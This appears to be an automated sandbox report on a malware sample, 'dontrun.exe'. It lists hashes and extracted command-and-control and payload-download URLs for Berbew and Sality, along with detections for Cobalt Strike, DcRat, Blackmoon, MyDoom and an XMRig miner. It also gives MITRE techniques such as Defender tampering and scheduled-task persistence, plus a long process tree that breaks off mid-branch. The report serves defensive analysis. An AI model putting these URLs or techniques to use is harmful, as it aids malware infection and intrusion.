berbew | 4a1ed7a206b3c4aa83b3c38f9a8f68cb5b875702afdb240b7b307616519bd0e9

Resubmissions

02-10-2024 19:51

241002-yk4hwaxcne 10

02-10-2024 19:49

241002-yjxzpstcqp 10

Analysis

max time kernel
1s
max time network
84s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02-10-2024 19:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dontrun.exe
Size

10.7MB
MD5

5520edc0639334d87e92c2b53e36803d
SHA1

3e7c547fd3f437a7fe4c09c8767dbcc5118d3dcf
SHA256

4a1ed7a206b3c4aa83b3c38f9a8f68cb5b875702afdb240b7b307616519bd0e9
SHA512

0824441ad3fd96aef8dc14ba89cf1d1f8ca6d513b89181b8d4b00803d2b64462c1da66ff52ce2a1e6726e80845e29c6694149a1c1a3d0177b99482056dc5b1dd
SSDEEP

196608:rqzv86gV6rbQQOOl2szsHFUK2r7UyTAdQmR8dA6lS8Qnf2ODjMnGydS8LrBOCRWs:yWVehZ2YsHFUK2JAdQJlaF3MnG38LrBR

Malware Config

Extracted

Family

berbew

http://crutop.nu/index.php

http://devx.nm.ru/index.php

http://ros-neftbank.ru/index.php

http://master-x.com/index.php

http://www.redline.ru/index.php

http://cvv.ru/index.php

http://hackers.lv/index.php

http://fethard.biz/index.php

http://crutop.ru/index.php

http://kaspersky.ru/index.php

http://color-bank.ru/index.php

http://adult-empire.com/index.php

http://virus-list.com/index.php

http://trojan.ru/index.php

http://xware.cjb.net/index.htm

http://konfiskat.org/index.htm

http://parex-bank.ru/index.htm

http://fethard.biz/index.htm

http://ldark.nm.ru/index.htm

http://gaz-prom.ru/index.htm

Extracted

Family

sality

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

Signatures

Berbew
Berbew is a backdoor written in C++.
backdoor berbew
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Cobalt Strike reflective loader 1 IoCs

Detects the reflective loader used by Cobalt Strike.

resource	yara_rule
behavioral1/files/0x0007000000023756-2155.dat	cobalt_reflective_dll

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Blackmoon payload 21 IoCs

resource	yara_rule
behavioral1/memory/5180-897-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/7032-869-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/6940-867-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/6808-842-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/7060-798-0x0000000000400000-0x000000000047C000-memory.dmp	family_blackmoon
behavioral1/memory/6548-795-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/6432-776-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/6272-768-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/800-751-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/5064-706-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/736-688-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/6124-685-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/5820-652-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/5672-601-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/5524-593-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/5276-537-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/5140-527-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/2096-519-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/2648-444-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/1740-441-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/752-437-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon

Detects MyDoom family 3 IoCs

resource	yara_rule
behavioral1/memory/6784-712-0x0000000000500000-0x0000000000510200-memory.dmp	family_mydoom
behavioral1/memory/1308-707-0x0000000000500000-0x0000000000510200-memory.dmp	family_mydoom
behavioral1/memory/1308-339-0x0000000000500000-0x0000000000510200-memory.dmp	family_mydoom

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Floxif, Floodfix
Floxif aka FloodFix is a file-changing trojan and backdoor written in C++.
backdoor trojan floxif
MyDoom
MyDoom is a Worm that is written in C++.
worm mydoom

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	12240	17400	schtasks.exe	823
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5776	17400	schtasks.exe	823
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	14836	17400	schtasks.exe	823
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	10740	17400	Process not Found	823
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7212	17400	Process not Found	823
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5920	17400	Process not Found	823

Sality
Sality is backdoor written in C++, first discovered in 2003.
backdoor sality
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x0007000000023dea-11368.dat	dcrat

Detects Floxif payload 1 IoCs

backdoor

resource	yara_rule
behavioral1/files/0x00090000000238d6-8443.dat	floxif

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral1/files/0x0007000000023756-2155.dat	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
15528	powershell.exe
17152	powershell.exe
8644	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x00090000000238d6-8443.dat	acprotect

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x000300000000002a-12276.dat	aspack_v212_v242

Clipboard Data 1 TTPs 1 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
15720	cmd.exe

Loads dropped DLL 17 IoCs

pid	Process
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe
4808	dontrun.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000700000002391f-4964.dat	themida

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

UPX packed file 36 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3612-286-0x00000000022E0000-0x0000000003310000-memory.dmp	upx
behavioral1/files/0x0007000000023756-2155.dat	upx
behavioral1/files/0x0007000000023835-2585.dat	upx
behavioral1/files/0x00070000000237d8-2304.dat	upx
behavioral1/memory/5180-897-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/7032-869-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/6940-867-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/6808-842-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/5572-805-0x0000000000400000-0x0000000000408000-memory.dmp	upx
behavioral1/memory/6548-795-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/6432-776-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/6272-768-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/5256-763-0x0000000000400000-0x0000000000408000-memory.dmp	upx
behavioral1/memory/800-751-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/6784-712-0x0000000000500000-0x0000000000510200-memory.dmp	upx
behavioral1/memory/1308-707-0x0000000000500000-0x0000000000510200-memory.dmp	upx
behavioral1/memory/5064-706-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/736-688-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/6124-685-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/5820-652-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/files/0x0007000000023518-651.dat	upx
behavioral1/memory/5672-601-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/5524-593-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/5276-537-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/5140-527-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/2096-519-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/3612-348-0x00000000022E0000-0x0000000003310000-memory.dmp	upx
behavioral1/memory/2648-444-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/1740-441-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/752-437-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/5256-424-0x0000000000400000-0x0000000000408000-memory.dmp	upx
behavioral1/memory/1308-339-0x0000000000500000-0x0000000000510200-memory.dmp	upx
behavioral1/memory/3612-252-0x00000000022E0000-0x0000000003310000-memory.dmp	upx
behavioral1/files/0x0007000000023a13-8669.dat	upx
behavioral1/files/0x00090000000238d6-8443.dat	upx
behavioral1/files/0x0007000000023a48-9273.dat	upx

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5044	sc.exe
3128	sc.exe

Program crash 11 IoCs

pid	pid_target	Process	procid_target
1528	2788	WerFault.exe
3080	9300	WerFault.exe
6568	10444	WerFault.exe
13504	9300	WerFault.exe
11136	9252	WerFault.exe
548	8912	WerFault.exe
8160	1816	WerFault.exe
7820	2788	WerFault.exe
15808	13116	WerFault.exe	675
7672	2464	WerFault.exe
17024	6524	WerFault.exe	169

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
16968	cmd.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
10712	taskkill.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5920	Process not Found
12240	schtasks.exe
5776	schtasks.exe
14836	schtasks.exe
10740	Process not Found
7212	Process not Found

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 4808	2532	dontrun.exe	84
PID 2532 wrote to memory of 4808	2532	dontrun.exe	84
PID 4808 wrote to memory of 1748	4808	dontrun.exe	85
PID 4808 wrote to memory of 1748	4808	dontrun.exe	85

C:\Users\Admin\AppData\Local\Temp\dontrun.exe
"C:\Users\Admin\AppData\Local\Temp\dontrun.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Users\Admin\AppData\Local\Temp\dontrun.exe
  "C:\Users\Admin\AppData\Local\Temp\dontrun.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1748
- - C:\Users\Admin\Downloads\241002-yfcjlatbll7f34701d83c1c98c38fb8f7ea67fe02f94849521f8ae4f15bc123b641c3daca0N.exe
    C:\Users\Admin\Downloads\241002-yfcjlatbll7f34701d83c1c98c38fb8f7ea67fe02f94849521f8ae4f15bc123b641c3daca0N.exe
    3⤵
    PID:116
  - - C:\Windows\SysWOW64\Cobkhb32.exe
      C:\Windows\system32\Cobkhb32.exe
      4⤵
      PID:3484
    - - C:\Windows\SysWOW64\Cbphdn32.exe
        
        C:\Windows\system32\Cbphdn32.exe
        5⤵
        
        PID:3496
      - C:\Windows\SysWOW64\Ckilmcgb.exe
        
        C:\Windows\system32\Ckilmcgb.exe
        6⤵
        
        PID:3076
        
        C:\Windows\SysWOW64\Ccpdoqgd.exe
        
        C:\Windows\system32\Ccpdoqgd.exe
        7⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Cjjlkk32.exe
        
        C:\Windows\system32\Cjjlkk32.exe
        8⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\Ckkiccep.exe
        
        C:\Windows\system32\Ckkiccep.exe
        9⤵
        
        PID:4588
        
        C:\Windows\SysWOW64\Cjliajmo.exe
        
        C:\Windows\system32\Cjliajmo.exe
        10⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\Dckdjomg.exe
        
        C:\Windows\system32\Dckdjomg.exe
        11⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\Embddb32.exe
        
        C:\Windows\system32\Embddb32.exe
        12⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\Gpnmbl32.exe
        
        C:\Windows\system32\Gpnmbl32.exe
        13⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\Hbhijepa.exe
        
        C:\Windows\system32\Hbhijepa.exe
        14⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\Idahjg32.exe
        
        C:\Windows\system32\Idahjg32.exe
        15⤵
        
        PID:7136
        
        C:\Windows\SysWOW64\Jnelok32.exe
        
        C:\Windows\system32\Jnelok32.exe
        16⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\Kkconn32.exe
        
        C:\Windows\system32\Kkconn32.exe
        17⤵
        
        PID:6704
        
        C:\Windows\SysWOW64\Lqkgbcff.exe
        
        C:\Windows\system32\Lqkgbcff.exe
        18⤵
        
        PID:7812
        
        C:\Windows\SysWOW64\Mccfdmmo.exe
        
        C:\Windows\system32\Mccfdmmo.exe
        19⤵
        
        PID:7236
        
        C:\Windows\SysWOW64\Ncofplba.exe
        
        C:\Windows\system32\Ncofplba.exe
        20⤵
        
        PID:1196
        
        C:\Windows\SysWOW64\Ojdnid32.exe
        
        C:\Windows\system32\Ojdnid32.exe
        21⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\Phaahggp.exe
        
        C:\Windows\system32\Phaahggp.exe
        22⤵
        
        PID:8652
        
        C:\Windows\SysWOW64\Aolblopj.exe
        
        C:\Windows\system32\Aolblopj.exe
        23⤵
        
        PID:8316
        
        C:\Windows\SysWOW64\Dheibpje.exe
        
        C:\Windows\system32\Dheibpje.exe
        24⤵
        
        PID:1424
        
        C:\Windows\SysWOW64\Enbjad32.exe
        
        C:\Windows\system32\Enbjad32.exe
        25⤵
        
        PID:8792
        
        C:\Windows\SysWOW64\Gihgfk32.exe
        
        C:\Windows\system32\Gihgfk32.exe
        26⤵
        
        PID:8588
        
        C:\Windows\SysWOW64\Iliinc32.exe
        
        C:\Windows\system32\Iliinc32.exe
        27⤵
        
        PID:9816
        
        C:\Windows\SysWOW64\Mqafhl32.exe
        
        C:\Windows\system32\Mqafhl32.exe
        28⤵
        
        PID:11488
        
        C:\Windows\SysWOW64\Pnmopk32.exe
        
        C:\Windows\system32\Pnmopk32.exe
        29⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\Mfnhfm32.exe
        
        C:\Windows\system32\Mfnhfm32.exe
        30⤵
        
        PID:12856
        
        C:\Windows\SysWOW64\Khkdad32.exe
        
        C:\Windows\system32\Khkdad32.exe
        31⤵
        
        PID:14420
        
        C:\Windows\SysWOW64\Jabiie32.exe
        
        C:\Windows\system32\Jabiie32.exe
        32⤵
        
        PID:10360
        
        C:\Windows\SysWOW64\Gpodkdll.exe
        
        C:\Windows\system32\Gpodkdll.exe
        33⤵
        
        PID:10660
- - C:\Users\Admin\Downloads\241002-yhj2fsxbpb1699807df552e44df51d4ec300d9c6a161189d3fe8c809b83f1c830b9ea13e55N.exe
    C:\Users\Admin\Downloads\241002-yhj2fsxbpb1699807df552e44df51d4ec300d9c6a161189d3fe8c809b83f1c830b9ea13e55N.exe
    3⤵
    PID:680
  - - C:\Windows\SysWOW64\Cobkhb32.exe
      C:\Windows\system32\Cobkhb32.exe
      4⤵
      PID:424
    - - C:\Windows\SysWOW64\Cbphdn32.exe
        
        C:\Windows\system32\Cbphdn32.exe
        5⤵
        
        PID:3412
      - C:\Windows\SysWOW64\Cijpahho.exe
        
        C:\Windows\system32\Cijpahho.exe
        6⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\Cbbdjm32.exe
        
        C:\Windows\system32\Cbbdjm32.exe
        7⤵
        
        PID:2964
        
        C:\Windows\SysWOW64\Cimmggfl.exe
        
        C:\Windows\system32\Cimmggfl.exe
        8⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\Ccbadp32.exe
        
        C:\Windows\system32\Ccbadp32.exe
        9⤵
        
        PID:1344
        
        C:\Windows\SysWOW64\Ckmehb32.exe
        
        C:\Windows\system32\Ckmehb32.exe
        10⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\Dlieda32.exe
        
        C:\Windows\system32\Dlieda32.exe
        11⤵
        
        PID:2736
        
        C:\Windows\SysWOW64\Eleepoob.exe
        
        C:\Windows\system32\Eleepoob.exe
        12⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\Gdjibj32.exe
        
        C:\Windows\system32\Gdjibj32.exe
        13⤵
        
        PID:3800
        
        C:\Windows\SysWOW64\Hgdejd32.exe
        
        C:\Windows\system32\Hgdejd32.exe
        14⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\Icdheded.exe
        
        C:\Windows\system32\Icdheded.exe
        15⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\Jdodkebj.exe
        
        C:\Windows\system32\Jdodkebj.exe
        16⤵
        
        PID:3220
        
        C:\Windows\SysWOW64\Kgipcogp.exe
        
        C:\Windows\system32\Kgipcogp.exe
        17⤵
        
        PID:6860
        
        C:\Windows\SysWOW64\Lcjcnoej.exe
        
        C:\Windows\system32\Lcjcnoej.exe
        18⤵
        
        PID:7848
        
        C:\Windows\SysWOW64\Mcecjmkl.exe
        
        C:\Windows\system32\Mcecjmkl.exe
        19⤵
        
        PID:6196
        
        C:\Windows\SysWOW64\Njpdnedf.exe
        
        C:\Windows\system32\Njpdnedf.exe
        20⤵
        
        PID:7356
        
        C:\Windows\SysWOW64\Olicnfco.exe
        
        C:\Windows\system32\Olicnfco.exe
        21⤵
        
        PID:8348
        
        C:\Windows\SysWOW64\Qhkdof32.exe
        
        C:\Windows\system32\Qhkdof32.exe
        22⤵
        
        PID:9120
        
        C:\Windows\SysWOW64\Cnfaohbj.exe
        
        C:\Windows\system32\Cnfaohbj.exe
        23⤵
        
        PID:9088
- - C:\Users\Admin\Downloads\241002-ygjdjatbql0c3857ac3dd0e92f8c402fec746d1bd9_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-ygjdjatbql0c3857ac3dd0e92f8c402fec746d1bd9_JaffaCakes118.exe
    3⤵
    PID:3612
- - C:\Users\Admin\Downloads\241002-x8xvkawgkg0c2c95ebb6b4ac039e2f03929e2048c1_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x8xvkawgkg0c2c95ebb6b4ac039e2f03929e2048c1_JaffaCakes118.exe
    3⤵
    PID:2788
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 256
      4⤵
      Program crash
      PID:7820
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 264
      4⤵
      Program crash
      PID:1528
- - C:\Users\Admin\Downloads\241002-ye5hzstbkl2e6d874f20cb0a2f4d56cc72a9802201063b9703f532cd7db77f541e8a645747N.exe
    C:\Users\Admin\Downloads\241002-ye5hzstbkl2e6d874f20cb0a2f4d56cc72a9802201063b9703f532cd7db77f541e8a645747N.exe
    3⤵
    PID:2924
  - - C:\Windows\SysWOW64\Djqblj32.exe
      C:\Windows\system32\Djqblj32.exe
      4⤵
      PID:1224
    - - C:\Windows\SysWOW64\Ecbjkngo.exe
        
        C:\Windows\system32\Ecbjkngo.exe
        5⤵
        
        PID:5188
      - C:\Windows\SysWOW64\Eiieicml.exe
        
        C:\Windows\system32\Eiieicml.exe
        6⤵
        
        PID:5764
        
        C:\Windows\SysWOW64\Gmbmkpie.exe
        
        C:\Windows\system32\Gmbmkpie.exe
        7⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\Hdhedh32.exe
        
        C:\Windows\system32\Hdhedh32.exe
        8⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\Ijqmhnko.exe
        
        C:\Windows\system32\Ijqmhnko.exe
        9⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\Jgpmmp32.exe
        
        C:\Windows\system32\Jgpmmp32.exe
        10⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\Kqdaadln.exe
        
        C:\Windows\system32\Kqdaadln.exe
        11⤵
        
        PID:7364
        
        C:\Windows\SysWOW64\Lkchelci.exe
        
        C:\Windows\system32\Lkchelci.exe
        12⤵
        
        PID:8052
        
        C:\Windows\SysWOW64\Mkohaj32.exe
        
        C:\Windows\system32\Mkohaj32.exe
        13⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\Nagpeo32.exe
        
        C:\Windows\system32\Nagpeo32.exe
        14⤵
        
        PID:6856
        
        C:\Windows\SysWOW64\Odoogi32.exe
        
        C:\Windows\system32\Odoogi32.exe
        15⤵
        
        PID:8076
        
        C:\Windows\SysWOW64\Pdmkhgho.exe
        
        C:\Windows\system32\Pdmkhgho.exe
        16⤵
        
        PID:8928
        
        C:\Windows\SysWOW64\Cocacl32.exe
        
        C:\Windows\system32\Cocacl32.exe
        17⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\Eifaim32.exe
        
        C:\Windows\system32\Eifaim32.exe
        18⤵
        
        PID:6576
        
        C:\Windows\SysWOW64\Gpelhd32.exe
        
        C:\Windows\system32\Gpelhd32.exe
        19⤵
        
        PID:7348
        
        C:\Windows\SysWOW64\Iebngial.exe
        
        C:\Windows\system32\Iebngial.exe
        20⤵
        
        PID:9880
        
        C:\Windows\SysWOW64\Modgdicm.exe
        
        C:\Windows\system32\Modgdicm.exe
        21⤵
        
        PID:7332
- - C:\Users\Admin\Downloads\241002-yhplyatclj508560270b27a86b0d9cb22f2e2b955f217cd267e622fa9426193c8b4a88abe0N.exe
    C:\Users\Admin\Downloads\241002-yhplyatclj508560270b27a86b0d9cb22f2e2b955f217cd267e622fa9426193c8b4a88abe0N.exe
    3⤵
    PID:2444
  - - C:\Windows\SysWOW64\Dmoohe32.exe
      C:\Windows\system32\Dmoohe32.exe
      4⤵
      PID:3628
    - - C:\Windows\SysWOW64\Efafgifc.exe
        
        C:\Windows\system32\Efafgifc.exe
        5⤵
        
        PID:5236
      - C:\Windows\SysWOW64\Elgaeolp.exe
        
        C:\Windows\system32\Elgaeolp.exe
        6⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\Gpqjglii.exe
        
        C:\Windows\system32\Gpqjglii.exe
        7⤵
        
        PID:372
        
        C:\Windows\SysWOW64\Hgfapd32.exe
        
        C:\Windows\system32\Hgfapd32.exe
        8⤵
        
        PID:6708
        
        C:\Windows\SysWOW64\Idhnkf32.exe
        
        C:\Windows\system32\Idhnkf32.exe
        9⤵
        
        PID:6352
        
        C:\Windows\SysWOW64\Jlmfeg32.exe
        
        C:\Windows\system32\Jlmfeg32.exe
        10⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\Kdpmbc32.exe
        
        C:\Windows\system32\Kdpmbc32.exe
        11⤵
        
        PID:7396
        
        C:\Windows\SysWOW64\Lnadagbm.exe
        
        C:\Windows\system32\Lnadagbm.exe
        12⤵
        
        PID:8080
        
        C:\Windows\SysWOW64\Meepdp32.exe
        
        C:\Windows\system32\Meepdp32.exe
        13⤵
        
        PID:5976
        
        C:\Windows\SysWOW64\Nlkgmh32.exe
        
        C:\Windows\system32\Nlkgmh32.exe
        14⤵
        
        PID:6400
        
        C:\Windows\SysWOW64\Oelolmnd.exe
        
        C:\Windows\system32\Oelolmnd.exe
        15⤵
        
        PID:8008
        
        C:\Windows\SysWOW64\Popbpqjh.exe
        
        C:\Windows\system32\Popbpqjh.exe
        16⤵
        
        PID:8868
        
        C:\Windows\SysWOW64\Cbpajgmf.exe
        
        C:\Windows\system32\Cbpajgmf.exe
        17⤵
        
        PID:8912
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8912 -s 404
        18⤵
        Program crash
        
        PID:548
- - C:\Users\Admin\Downloads\241002-yclm4atakrc25544dbbf4564f31c50c9e4c0fbb48e0b256709cb28c50a60c8c98a8331154cN.exe
    C:\Users\Admin\Downloads\241002-yclm4atakrc25544dbbf4564f31c50c9e4c0fbb48e0b256709cb28c50a60c8c98a8331154cN.exe
    3⤵
    PID:752
  - - \??\c:\dpddd.exe
      c:\dpddd.exe
      4⤵
      PID:5140
    - - \??\c:\hhhhbb.exe
        
        c:\hhhhbb.exe
        5⤵
        
        PID:5756
      - \??\c:\1nnhbh.exe
        
        c:\1nnhbh.exe
        6⤵
        
        PID:6272
        
        \??\c:\9lxxrrr.exe
        
        c:\9lxxrrr.exe
        7⤵
        
        PID:6940
        
        \??\c:\lllxlrx.exe
        
        c:\lllxlrx.exe
        8⤵
        
        PID:5844
        
        \??\c:\vdddv.exe
        
        c:\vdddv.exe
        9⤵
        
        PID:6380
        
        \??\c:\llfxxxx.exe
        
        c:\llfxxxx.exe
        10⤵
        
        PID:7552
        
        \??\c:\3httnn.exe
        
        c:\3httnn.exe
        11⤵
        
        PID:6316
        
        \??\c:\vjjjv.exe
        
        c:\vjjjv.exe
        12⤵
        
        PID:6504
        
        \??\c:\tntnhb.exe
        
        c:\tntnhb.exe
        13⤵
        
        PID:8368
        
        \??\c:\vvddp.exe
        
        c:\vvddp.exe
        14⤵
        
        PID:9140
        
        \??\c:\xllfrrl.exe
        
        c:\xllfrrl.exe
        15⤵
        
        PID:7300
        
        \??\c:\bhhhhh.exe
        
        c:\bhhhhh.exe
        16⤵
        
        PID:7796
        
        \??\c:\vpjvj.exe
        
        c:\vpjvj.exe
        17⤵
        
        PID:5404
        
        \??\c:\frxrllf.exe
        
        c:\frxrllf.exe
        18⤵
        
        PID:8888
        
        \??\c:\xrlfrlf.exe
        
        c:\xrlfrlf.exe
        19⤵
        
        PID:7824
        
        \??\c:\hhbtbt.exe
        
        c:\hhbtbt.exe
        20⤵
        
        PID:9680
        
        \??\c:\5hbbtt.exe
        
        c:\5hbbtt.exe
        21⤵
        
        PID:9112
        
        \??\c:\btnhtn.exe
        
        c:\btnhtn.exe
        22⤵
        
        PID:12760
        
        \??\c:\1rllxxx.exe
        
        c:\1rllxxx.exe
        23⤵
        
        PID:2016
        
        \??\c:\nbbbtn.exe
        
        c:\nbbbtn.exe
        24⤵
        
        PID:16464
        
        \??\c:\bhhnhh.exe
        
        c:\bhhnhh.exe
        25⤵
        
        PID:17776
        
        \??\c:\xrlrllf.exe
        
        c:\xrlrllf.exe
        26⤵
        
        PID:4492
- - C:\Users\Admin\Downloads\241002-x5lccssfmj2d79233f90b49e18287326a0b697bacb1bd0d139e910580248290d40c609d692N.exe
    C:\Users\Admin\Downloads\241002-x5lccssfmj2d79233f90b49e18287326a0b697bacb1bd0d139e910580248290d40c609d692N.exe
    3⤵
    PID:5040
  - - C:\Windows\SysWOW64\Dfgcakon.exe
      C:\Windows\system32\Dfgcakon.exe
      4⤵
      PID:4724
    - - C:\Windows\SysWOW64\Ebjcajjd.exe
        
        C:\Windows\system32\Ebjcajjd.exe
        5⤵
        
        PID:5560
      - C:\Windows\SysWOW64\Glcaambb.exe
        
        C:\Windows\system32\Glcaambb.exe
        6⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\Hdehni32.exe
        
        C:\Windows\system32\Hdehni32.exe
        7⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\Iljpij32.exe
        
        C:\Windows\system32\Iljpij32.exe
        8⤵
        
        PID:7108
        
        C:\Windows\SysWOW64\Jkgpbp32.exe
        
        C:\Windows\system32\Jkgpbp32.exe
        9⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\Kqmkae32.exe
        
        C:\Windows\system32\Kqmkae32.exe
        10⤵
        
        PID:6592
        
        C:\Windows\SysWOW64\Lcggio32.exe
        
        C:\Windows\system32\Lcggio32.exe
        11⤵
        
